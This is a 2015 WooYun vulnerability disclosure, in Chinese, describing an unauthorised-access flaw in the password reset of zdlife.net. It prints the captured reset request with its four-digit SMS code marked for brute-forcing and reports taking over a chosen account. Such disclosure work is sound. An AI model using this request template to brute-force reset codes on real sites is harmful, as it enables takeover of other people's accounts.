当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120276

漏洞标题:山东省某大型生活服务类平台重置密码一

相关厂商:指动生活

漏洞作者: TwoEyes

提交时间:2015-06-16 15:41

修复时间:2015-07-31 15:42

公开时间:2015-07-31 15:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上一集我们说到xss的问题,这里我们说一下重置密码

详细说明:

选择忘记密码,来到密码找回页面:
输入要找回的手机号:

密码重置.png


抓下来数据包进行单步分析:

POST /register/1102 HTTP/1.1
Host: www.zdlife.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.zdlife.net/user/getPassword
Content-Length: 72
Cookie: CNZZDATA1*****10=565657897-1434007779-http%253A%252F%252Fwww.zdlife.net%252F%7C1434190015; Hm_lvt_1c5720ea5b4ab80ea51191cc906afb81=1434011480,1434013415,1434188301; bdshare_firstime=1434021988298; username=*******; userid=ff8080814d2a61**********; JSESSIONID=A80DD*******90494B87EC960B745; cateTypeCookie=2; Hm_lpvt_1c5720ea5b4ab80ea51191cc906afb81=1434190412
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
data=%7B%22mobile%22%3A%2218364******%22%2C%22ranCode%22%3A%22§1111§%22%7D


经过测试,发现手机收到的是四位的密码。过期时间是5分钟,但是这已经足够了
来,看

爆破ok.png


找回ok.png


找回2.png


成功.png


经过上面的一系列操作,我们就找回了指定人的账号,进行登陆
但是,发现没,好像这才是故事刚刚开始。

漏洞证明:

成功.png

修复方案:

验证码,6位的更放心。
把开发找来,吊打

版权声明:转载请注明来源 TwoEyes@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝